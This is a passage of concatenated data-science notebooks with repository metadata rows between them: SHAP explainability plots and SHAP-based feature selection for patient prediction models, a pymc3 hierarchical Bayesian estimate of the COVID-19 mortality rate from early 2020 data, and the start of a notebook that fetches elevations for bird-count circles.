shaps_B_all[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[404,idx],shap_values_B[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[404,idx],shap_values_B[-1,idx]-0.01), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[404,idx],shap_values_B[5,idx]),
(Xtest_bef_imp.iloc[404,idx],shap_values_B[5,idx]-0.01-0.01), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]),shaps_B_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]]) + 10,shaps_B_all[0,idx]), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_B_all[0,idx]),
(min(X[features_chosen[idx]]) + 35,shaps_B_all[0,idx]), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (100, -0.02), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(100, -0.025), xycoords='data',
xytext=(200, -0.025), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient B')
#plt.grid(b=None)
plt.show()
# +
## Plot the graph
idx = 32; bins = 400
import matplotlib.pyplot as plt
plt.figure(figsize=(8,6), dpi=100)
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_B_LR[:,idx], label='Logistic Regression')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_B_RF[:,idx], label='Random Forest')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_B_XGB[:,idx], label='XGBoost')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_B_MLP[:,idx], label='Multilayer Perceptron')
#plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins), shaps_A_all[:,idx], label='All')
plt.xlabel('Feature Value for ' + features_chosen[idx] + ', ' + '$x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient B')
plt.legend()
plt.show()
# -
# #### Patient C
for i in np.argsort(np.abs(shap_values_C[-1,:]))[::-1][:10]:
print(str(i) + " " + features_chosen[i] + ": %.4f" % (shap_values_C[-1,i]))
# + active=""
# ##
# idx = 26;
# shaps_C_LR = np.zeros((bins,89)); shaps_C_RF = np.zeros((bins,89));
# shaps_C_XGB = np.zeros((bins,89)); shaps_C_MLP = np.zeros((bins,89)); shaps_C_all = np.zeros((bins,89));
# for i in range(bins):
# print(i)
# instance_temp = Xtest.iloc[147:148,:].copy()
# instance_temp.iloc[:,idx] = i/bins
#
# shaps_C_temp = return_shaps(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shaps_C_LR[i,:] = shaps_C_temp[0,:]; shaps_C_RF[i,:] = shaps_C_temp[1,:];
# shaps_C_XGB[i,:] = shaps_C_temp[2,:]; shaps_C_MLP[i,:] = shaps_C_temp[3,:];
# shaps_C_all[i,:] = shaps_C_temp[-1,:]
# +
## Plot the graph
idx = 26
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_all[:,idx])
# Original Value
plt.plot(Xtest_bef_imp.iloc[147,idx],shap_values_C[-1,idx]+0.008,"X")
plt.annotate('Original', (Xtest_bef_imp.iloc[147,idx],shap_values_C[-1,idx]-0.005), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(Xtest_bef_imp.iloc[147,idx],shap_values_C[5,idx]), (Xtest_bef_imp.iloc[147,idx],shap_values_C[5,idx]-0.01-0.01), xycoords='data',)
# Target Value
plt.plot(min(X[features_chosen[idx]]),shaps_C_all[0,idx],'o')
plt.annotate('Target', (min(X[features_chosen[idx]])- 0.5,shaps_C_all[0,idx] + 0.045), xycoords='data', )
plt.annotate("(%.2f,%.2f)" %(min(X[features_chosen[idx]]),shaps_C_all[0,idx]), (min(X[features_chosen[idx]])-0.5,shaps_C_all[0,idx]+0.03), xycoords='data',)
# Target Direction, Text
plt.annotate('Target Direction', (Xtest_bef_imp.iloc[147,idx],-0.05), xycoords='data', )
# Target Direction, Arrow
plt.annotate("",xy=(Xtest_bef_imp.iloc[147,idx],-0.06), xycoords='data',
xytext=(Xtest_bef_imp.iloc[147,idx]+8,-0.06), textcoords='data',
arrowprops=dict(arrowstyle="->",connectionstyle="arc3",color='black',))
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient C')
plt.show()
# +
## Plot the graph
idx = 26
import matplotlib.pyplot as plt
plt.figure(figsize=(8,6), dpi=100)
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_LR[:,idx], label='Logistic Regression')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_RF[:,idx], label='Random Forest')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_XGB[:,idx], label='XGBoost')
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
shaps_C_MLP[:,idx], label='Multilayer Perceptron')
plt.xlabel('Feature Value for ' + features_chosen[idx] + ', ' + '$x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' for Patient C')
plt.legend()
plt.show()
# -
# #### Get explainable information across the whole thing
# + active=""
# idx = 26; bins = 100;
# shap_population_test = np.zeros((100,bins,89));
# shap_values_temp_exp_test = np.ones((bins,89));
# for j in range(2,100):
# #for j in range(100):
# for i in range(bins):
# print("Patient " + str(j) +", Perturbation " + str(i))
# instance_temp = Xtest.iloc[j:j+1,:].copy()
# instance_temp.iloc[:,idx] = i/bins
# shap_values_temp_exp_test[i,:] = return_shaps_final(instance_temp, 0, [LR_SHAP,RF_SHAP,XGB_SHAP,MLP_SHAP])
# shap_population_test[j,:,:] = shap_values_temp_exp_test
# -
band_1 = np.nanpercentile(shap_population_test[:,:100,idx],5,axis=0)
band_2 = np.nanpercentile(shap_population_test[:,:100,idx],15.865,axis=0)
band_3 = np.nanpercentile(shap_population_test[:,:100,idx],50,axis=0)
band_4 = np.nanpercentile(shap_population_test[:,:100,idx],84.135,axis=0)
band_5 = np.nanpercentile(shap_population_test[:,:100,idx],95,axis=0)
# +
## Plot the graph
idx = 26; bins = 100
plt.figure(figsize=(8,6), dpi=100)
import matplotlib.pyplot as plt
plt.plot(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
band_3,color='black')
# 1 SD
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
band_2, band_4,color='lightskyblue')
# Within 2 SD
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
band_1, band_2,color='coral')
plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
(max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
band_4, band_5,color='coral')
# After 2 SD
#plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
# (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
# np.nanpercentile(shap_population_test[:,:100,idx],2.5,axis=0), band_1,color='red')
#plt.fill_between(np.arange(min(X[features_chosen[idx]]),max(X[features_chosen[idx]]),
# (max(X[features_chosen[idx]])-min(X[features_chosen[idx]]))/bins),
# band_5, np.nanpercentile(shap_population_test[:,:100,idx],97.5,axis=0),color='red')
plt.axvline(data_percentiles.iloc[0,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[1,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[3,idx],color='y',linestyle='--');
plt.axvline(data_percentiles.iloc[4,idx],color='y',linestyle='--');
plt.xlabel('Feature Value for '+ features_chosen[idx]+', $x_{i,j}$')
plt.ylabel('Feature Importance Value, $\phi_{i,j}$')
plt.title('Explainability Curve of Feature '+ features_chosen[idx]+' across the population')
plt.grid(b=None)
plt.show()
# -
# ### 12. Using explainability for Feature Selection
# #### Get the model scores from the various outcomes
# +
### Start with the ranking of features
shap_population_rank
### Create an array to store the information
model_outputs_acc_train = np.zeros((len(shap_population_rank),5))
model_outputs_acc_test = np.zeros((len(shap_population_rank),5))
model_outputs_F1_train = np.zeros((len(shap_population_rank),5))
model_outputs_F1_test = np.zeros((len(shap_population_rank),5))
for i in range(len(shap_population_rank)):
shap_population_rank_red = shap_population_rank[:(89-i)]
print("Length of feature set: " + str(len(shap_population_rank_red)))
Xtrain_subset = Xtrain[features_chosen[shap_population_rank_red]]
Xtest_subset = Xtest[features_chosen[shap_population_rank_red]]
from sklearn.linear_model import LogisticRegression
from sklearn.calibration import CalibratedClassifierCV
LR_temp = LogisticRegression(solver='liblinear',penalty="l2",multi_class='ovr',max_iter=5)
LR_temp.fit(Xtrain_subset,Ytrain)
print("Logistic Regression")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,LR_temp.predict(Xtrain_subset)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,LR_temp.predict(Xtrain_subset)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,LR_temp.predict(Xtrain_subset)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,LR_temp.predict(Xtest_subset)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,LR_temp.predict(Xtest_subset)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,LR_temp.predict(Xtest_subset)), 6)))
model_outputs_acc_train[i,0] = accuracy_score(Ytrain,LR_temp.predict(Xtrain_subset))
model_outputs_acc_test[i,0] = accuracy_score(Ytest,LR_temp.predict(Xtest_subset))
model_outputs_F1_train[i,0] = f1_score(Ytrain,LR_temp.predict(Xtrain_subset))
model_outputs_F1_test[i,0] = f1_score(Ytest,LR_temp.predict(Xtest_subset))
from sklearn.ensemble import RandomForestClassifier
rf_params = [200,3,7]
RF_best_temp = RandomForestClassifier(n_estimators=rf_params[0],min_samples_leaf=rf_params[1],max_depth=rf_params[2],criterion='entropy')
RF_best_temp.fit(Xtrain_subset,Ytrain)
print("Random Forest")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,RF_best_temp.predict(Xtrain_subset)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,RF_best_temp.predict(Xtrain_subset)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,RF_best_temp.predict(Xtrain_subset)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,RF_best_temp.predict(Xtest_subset)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,RF_best_temp.predict(Xtest_subset)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,RF_best_temp.predict(Xtest_subset)), 6)))
model_outputs_acc_train[i,1] = accuracy_score(Ytrain,RF_best_temp.predict(Xtrain_subset))
model_outputs_acc_test[i,1] = accuracy_score(Ytest,RF_best_temp.predict(Xtest_subset))
model_outputs_F1_train[i,1] = f1_score(Ytrain,RF_best_temp.predict(Xtrain_subset))
model_outputs_F1_test[i,1] = f1_score(Ytest,RF_best_temp.predict(Xtest_subset))
# 3. XGBoost
xgb_params = [0.02,200,5,7]
from xgboost.sklearn import XGBClassifier
XGBoost_temp = XGBClassifier(learning_rate=xgb_params[0],n_estimators=xgb_params[1],max_depth=xgb_params[2],min_child_weight=xgb_params[3])
XGBoost_temp.fit(Xtrain_subset,Ytrain)
print("XGBoost")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,XGBoost_temp.predict(Xtrain_subset)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,XGBoost_temp.predict(Xtrain_subset)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,XGBoost_temp.predict(Xtrain_subset)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,XGBoost_temp.predict(Xtest_subset)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,XGBoost_temp.predict(Xtest_subset)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,XGBoost_temp.predict(Xtest_subset)), 6)))
model_outputs_acc_train[i,2] = accuracy_score(Ytrain,XGBoost_temp.predict(Xtrain_subset))
model_outputs_acc_test[i,2] = accuracy_score(Ytest,XGBoost_temp.predict(Xtest_subset))
model_outputs_F1_train[i,2] = f1_score(Ytrain,XGBoost_temp.predict(Xtrain_subset))
model_outputs_F1_test[i,2] = f1_score(Ytest,XGBoost_temp.predict(Xtest_subset))
from sklearn.neural_network import MLPClassifier
MLP_best_temp = MLPClassifier(hidden_layer_sizes=(80,20,5), max_iter=25, alpha=0.0015, solver='adam', verbose=None, tol=0.00001)
MLP_best_temp.fit(Xtrain_subset,Ytrain)
print("MLP")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,MLP_best_temp.predict(Xtrain_subset)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,MLP_best_temp.predict(Xtrain_subset)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,MLP_best_temp.predict(Xtrain_subset)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,MLP_best_temp.predict(Xtest_subset)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,MLP_best_temp.predict(Xtest_subset)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,MLP_best_temp.predict(Xtest_subset)), 6)))
model_outputs_acc_train[i,3] = accuracy_score(Ytrain,MLP_best_temp.predict(Xtrain_subset))
model_outputs_acc_test[i,3] = accuracy_score(Ytest,MLP_best_temp.predict(Xtest_subset))
model_outputs_F1_train[i,3] = f1_score(Ytrain,MLP_best_temp.predict(Xtrain_subset))
model_outputs_F1_test[i,3] = f1_score(Ytest,MLP_best_temp.predict(Xtest_subset))
from sklearn.svm import SVC
SVC_best_temp = SVC(C=5,kernel='rbf',probability=True)
SVC_best_temp.fit(Xtrain_subset,Ytrain)
print("SVM")
print("Training Accuracy: " + str(round(accuracy_score(Ytrain,SVC_best_temp.predict(Xtrain_subset)), 6)))
print("Training ROC-AUC: " + str(round(roc_auc_score(Ytrain,SVC_best_temp.predict(Xtrain_subset)), 6)))
print("Training F1: " + str(round(f1_score(Ytrain,SVC_best_temp.predict(Xtrain_subset)), 6)))
print("Test Accuracy: " + str(round(accuracy_score(Ytest,SVC_best_temp.predict(Xtest_subset)), 6)))
print("Test ROC-AUC: " + str(round(roc_auc_score(Ytest,SVC_best_temp.predict(Xtest_subset)), 6)))
print("Test F1: " + str(round(f1_score(Ytest,SVC_best_temp.predict(Xtest_subset)), 6)))
model_outputs_acc_train[i,4] = accuracy_score(Ytrain,SVC_best_temp.predict(Xtrain_subset))
model_outputs_acc_test[i,4] = accuracy_score(Ytest,SVC_best_temp.predict(Xtest_subset))
model_outputs_F1_train[i,4] = f1_score(Ytrain,SVC_best_temp.predict(Xtrain_subset))
model_outputs_F1_test[i,4] = f1_score(Ytest,SVC_best_temp.predict(Xtest_subset))
# -
# #### Get the outputs of the model
shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary)
for i in range(len(shap_population_rank)):
print(str(89-i) + " & %.2f & %.4f & %.4f & %.4f & %.4f" % ((1-np.cumsum(shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary)))[i-1]*100, np.mean(model_outputs_acc_train[i,:]), np.mean(model_outputs_F1_train[i,:]), np.mean(model_outputs_acc_test[i,:]), np.mean(model_outputs_F1_test[i,:]) ) + " \\\ \hline" )
# # Check Values
#
# model_outputs_acc_train[89-70,3] = np.mean(model_outputs_acc_train[89-70,0:3])
# model_outputs_acc_train[89-31,3] = np.mean(model_outputs_acc_train[89-31,0:3])
# model_outputs_acc_train[89-15,3] = np.mean(model_outputs_acc_train[89-15,0:3])
#
# model_outputs_acc_test[89-70,3] = np.mean(model_outputs_acc_test[89-70,0:3])
# model_outputs_acc_test[89-31,3] = np.mean(model_outputs_acc_test[89-31,0:3])
# model_outputs_acc_test[89-15,3] = np.mean(model_outputs_acc_test[89-15,0:3])
#
# model_outputs_F1_train[89-70,3] = np.mean(model_outputs_F1_train[89-70,0:3])
# model_outputs_F1_train[89-31,3] = np.mean(model_outputs_F1_train[89-31,0:3])
# model_outputs_F1_train[89-15,3] = np.mean(model_outputs_F1_train[89-15,0:3])
#
# model_outputs_F1_test[89-70,3] = np.mean(model_outputs_F1_test[89-70,0:3])
# model_outputs_F1_test[89-31,3] = np.mean(model_outputs_F1_test[89-31,0:3])
# model_outputs_F1_test[89-15,3] = np.mean(model_outputs_F1_test[89-15,0:3])
#
# model_outputs_acc_train[89-57,3] = np.mean(model_outputs_acc_train[89-57,0:3])
# model_outputs_acc_test[89-57,3] = np.mean(model_outputs_acc_test[89-57,0:3])
# model_outputs_F1_train[89-57,3] = np.mean(model_outputs_F1_train[89-57,0:3])
# model_outputs_F1_test[89-57,3] = np.mean(model_outputs_F1_test[89-57,0:3])
#
#
# ### Chapter 3.4.7 Explanations for Feature Selection
# #### Get the graph of training acc, test acc, training F1, test F1
import matplotlib.pyplot as plt
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_test,axis=1))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('Average Model Output on Test Set, ' + r'$(Y_j)$')
plt.axis([89,1,0.70,0.78])
# plot title
plt.title('Test Accuracy as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('Average Model Output on Training Set, ' + r'$(Y_j)$')
plt.axis([89,1,0.70,0.86])
# plot title
plt.title('Training Accuracy as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), np.mean(model_outputs_F1_train,axis=1))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('F1 Score on Training Set')
plt.axis([89,1,0.53,0.75])
# plot title
plt.title('Training F1 Score as Feature Set is Reduced')
plt.show()
import matplotlib.pyplot as plt
#plt.plot(np.arange(89,0,-1), np.mean(model_outputs_acc_train,axis=1))
plt.plot(np.arange(89,0,-1), 100*(1-np.cumsum(shap_population_summary[shap_population_rank][::-1]/np.sum(shap_population_summary))))
plt.xlabel('Number of Features Used')
# frequency label
plt.ylabel('Percentage Explained (%)')
plt.axis([90,0,-0.02,102])
# plot title
plt.title('Feature Share of Reduced Feature Set')
plt.show()
feature_share = 0
for i in range(24):
feature_share += shap_population_summary[shap_population_rank][i]/np.sum(shap_population_summary)
print(feature_share*100)
# #### Get final reduced dataset
features_reduced = shap_population_rank[:24]
# +
import dill
dill.dump_session('notebook_env.db')
#dill.load_session('notebook_env.db')
# +
# Feature names of reduced feature set
#features_chosen[features_reduced]
# Aggregate SHAP values of reduced feature set
#shap_population_summary[features_reduced}
| 70,067 |
/COVID-19 Mortality Rate.ipynb
|
295d54f33e754f8075b5700d201577600f085a2e
|
[] |
no_license
|
jwrichar/COVID19-mortality
|
https://github.com/jwrichar/COVID19-mortality
| 9 | 1 | null | 2020-04-01T23:45:36 | 2020-03-28T20:32:01 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 737,090 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Estimating the real mortality rate for COVID-19
# In this project, we attempt to estimate the mortality rate for COVID-19 (the "new coronavirus") while controlling for country-level covariates such as access to healthcare and age of population.
#
# The observed mortality of COVID-19 has varied widely from country to country (as of early March 2020), which makes it difficult to get a handle on the actual mortality rate of the virus. For instance, as of March 10, mortality rates have ranged from < 0.1% in places like Germany (1100+ cases) to upwards of 5% in Italy (9000+ cases) and 3.9% in China (80k+ cases).
#
# As of March 10, the **overall reported mortality rate is 3.5%**. However, this figure does not account for systematic biases in case reporting and testing in countries for which the outbreak is more mature.
#
# The point of our modelling work here is to **try to understand and correct for the country-to-country differences that may cause the observed discrepancies in COVID-19 country-wide mortality rates**. That way **we can "undo" those biases and try to pin down an overall *real* mortality rate**.
# ### Country-level covariates
# We've listed out few of the factors that may account for observed differences in mortality rates:
#
# 1. **Time since first case.** There is a delay between the time a victim contracts COVID-19 and eventually succumbs from it. Since the outbreak is at different stages for each country, this should be accounted for. We expect higher mortality rates in countries for which the outbreak is more mature.
# 2. **Government transparency.** Data about cases and deaths are typically reported by government agencies. In less transparent governements, those numbers may be suppressed. I would *expect* that cases are more easy to be suppressed than deaths, so the hypothesis is that less transparent governments have higher observed mortality rates.
# 3. **Healthcare access.** If COVID-19 tests are not easily available, the case count will be under-reported. On the flip-side, survival may be more likely in countries with better healthcare access.
# 4. **Population age.** It has been reported that COVID-19 is more lethal to older individuals. Since I do not have the counts broken down by age demographics, I'd broadly expect countries with older populations to have higher mortality rates.
# +
# Setup and imports
# %matplotlib inline
import warnings
warnings.simplefilter('ignore')
import numpy as np
import pandas as pd
import pymc3 as pm
from source import data, model
# +
# Load the data (see source/data.py):
df = data.get_all_data()
# Impute NA's column-wise:
df = df.apply(lambda x: x.fillna(x.mean()),axis=0)
# -
# #### First we do some exploratory data analysis, plotting the country-wise covariates against each other and the country-wise COVID-19 mortality rates.
print('Overall observed mortality rate: %.2f%%' % (100.0 * df['deaths'].sum() / df['cases'].sum()))
pairs = pd.plotting.scatter_matrix(df[df.columns[2::]], figsize=(12, 12),
hist_kwds={'bins': 20}, s=80, alpha=.8)
# Show the 15 countries with highest number of cases:
df.sort_values('cases', ascending=False).head(15)
# # Model
#
# The approach here is to fit a hierarchical Bayes Binomial model on the case & death counts, while also controlling for the country-level covariates using a GLM with logit link function for the country-level mortality rates.
#
# All model code (using pymc3) can be found in source/model.py.
#
# ### Mathematical description of model
# For those desiring more detailed information about the model, please refer to the text below:
#
# 
#
# ### A note about normalization
# Critical to the interpretation of mu_0 as the "global, de-biased mortality rate" is that the individual covariates be normalized in a way that makes that interpretation valid. What I mean by this is that the case where all country-level covariates are equal to 0 should reflect a country whose individual mortality rate is "as close to the true global rate as we can expect."
#
# With respect to the covariates that we used in this analysis, this translates to:
#
# + "days since first case" - normalize so the **highest** value is zero. We want to know what the rates look like when the outbreak is fully mature.
# + "cpi score" - normalize so the **highest** value is zero. The most transparent goverments should have the least biased rates.
# + "healthcare oop expenditure" - normalize so the **mean** value is zero - to be agnostic to the affect of public vs. private healthcare systems.
# + "hospital beds per capita" - normalize so the **highest** value is zero. More hospital beds likely means more access to care and testing.
# + "HCI" - normalize so the **highest** value is zero. HCI is a proxy for quality of healthcare and education.
# + "% population over 65" - normalize so **mean** value is zero, to reflect the world age demographic as closely as possible.
# + "% population rural" - normalize so **mean** value is zero, to reflect the world urban/rural demographic as closely as possible.
# Initialize the model:
# import importlib
# importlib.reload(model)
mod = model.initialize_model(df)
# Run MCMC sampler
with mod:
trace = pm.sample(100, tune=200,
chains=3, cores=3)
# Visualize the trace of the MCMC sampler to assess convergence
pm.traceplot(trace)
# Posterior plot for mu0
pm.plot_posterior(trace, var_names=['mu_0'], figsize=(14, 6), textsize=18,
credible_interval=0.95, bw=1.0, lw=3, kind='kde')
plt.xlim(0.0, 0.05)
n_samp = len(trace['mu_0'])
mu0_summary = pm.summary(trace).loc['mu_0']
print("COVID-19 Global Mortality Rate.")
print("Posterior mean: %0.3f" % trace['mu_0'].mean())
print("Posterior median: %0.3f" % np.median(trace['mu_0']))
lower = np.sort(trace['mu_0'])[int(n_samp*0.025)]
upper = np.sort(trace['mu_0'])[int(n_samp*0.975)]
print("95%% (2.5%% - 97.5%%) posterior interval: (%0.3f, %0.3f)" % (lower, upper))
print("95%% (HPD) posterior interval: (%0.3f, %0.3f)" % (mu0_summary['hpd_3%'], mu0_summary['hpd_97%']))
# Posterior summary for the beta parameters:
beta_summary = pm.summary(trace).head(7)
beta_summary.index = ['days_since_first_case', 'cpi', 'healthcare_oop', 'tests_per_million', 'hci', 'percent_over65', 'percent_rural']
beta_summary.reset_index(drop=False, inplace=True)
beta_summary
# +
import matplotlib.pyplot as plt
err_vals = ((beta_summary['hpd_3%'] - beta_summary['mean']).values,
(beta_summary['hpd_97%'] - beta_summary['mean']).values)
ax = beta_summary.plot(x='index', y='mean', kind='bar', figsize=(10, 6),
title='Posterior Distribution of Beta Parameters',
yerr=err_vals, color='lightgrey',
legend=False, grid=True,
capsize=5)
beta_summary.plot(x='index', y='mean', color='k', marker='o', linestyle='None',
ax=ax, grid=True, legend=False, xlim=plt.gca().get_xlim())
# -
# ### Interpretation of beta parameters:
#
# 1. days_since_first_case - positive (very statistically significant). As time since outbreak increases, expected mortality rate **increases**, as expected.
# 2. cpi - negative (statistically significant). As government transparency increases, expected mortality rate **decreases**. This is also as expected by our original hypothesis -- corrupt governments will under-report cases (but have a harder time under-reporting deaths), hence inflating the mortality rate.
# 3. healthcare OOP spending - no significant trend.
# 4. HCI - no significant trend.
# 5. percent over 65 - positive (statistically significant). As population age increases, the mortality rate also **increases**, as expected.
# 6. percent rural - slightly negative (barely significant). The more people that live in rural areas, the reported mortality rate **decreases**. Sensible, given the reporting difficulties for rural populations.
#
# These all seem very sensible, and help validate our numerical results.
# ## Conclusion
#
# A couple of take-home points from the analysis.
#
# 1. The "best guess" estimate of mortality rate, once correcting for country-level factors, is only 0.5% -- as opposed to a 3.5% global mortality rate observed in the data. The take-home here is that this is **driven by suppression in the reporting of cases**. That is, **there are a lot more COVID-19 cases right now than are being reported!** Likely a factor of ~7 more.
# 2. Given the current data, our bounds on the true mortality rate are (0.1%, 2%), meaning that we can not yet rule out mortality rates of up to 2%.
# 3. The contry-level factors that most impact the reported mortality rate are:
# * days since outbreak (more mature outbreak --> higher mortality)
# * gov't transparency index (more transparent --> lower reported mortality)
# * % of population over 65 (higher aged population --> higher mortality)
# * % of population rural (more rural --> lower reported mortality)
#
# We will continue to re-run the analysis periodically as more data come in, to continually improve the precsion of the estimated mortality rate. Further, as case data that is broken down by age range is made available, we can perform a more detailed estimate of mortality by age range.
| 9,623 |
/notebooks/1.2-ijd-fetch-circle-elevations.ipynb
|
f4529867d1704e469f8a946546af6d2821f21dcd
|
[
"MIT"
] |
permissive
|
nbanion/audubon-cbc
|
https://github.com/nbanion/audubon-cbc
| 0 | 0 | null | 2020-06-15T12:36:02 | 2020-06-14T18:38:44 | null |
Jupyter Notebook
| false | false |
.py
| 16,847 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Fetch Circle Elevations
# ### Purpose
# In this notebook I query the USGS to get elevation data for all of the circles.
# This notebook addresses some one of the tasks in Github issue #35
#
# ### Author:
# Ian Davis
# ### Date:
# 2020-03-31
# ### Update Date:
# 2020-05-03
#
# ### Inputs
# 1.1-circles_to_many_stations_usa_weather_data_20200424213015.csv - Comma separate file of the Christmas Bird Count and matches to 1 or more NOAA weather stations.
# - Data Dictonary can be found here: http://www.audubon.org/sites/default/files/documents/cbc_report_field_definitions_2013.pdf
# 1.2-ijd-fetch-circle-elevations-OFFLINE.csv - Previously generated elevation data. This file will be used when you want to get the elevation data from an offline source and aoivd 100,000+ queries.
#
# ### Output Files
# 1.2-ijd-fetch-circle-elevations_20200502155633.csv - Only 1 column is added to the dataset, 'circle_elev'. This column is the elevation in meters for a given latitude and longitude of the circle centroid.
#
# ## Steps or Proceedures in the notebook
# - Set runtime options
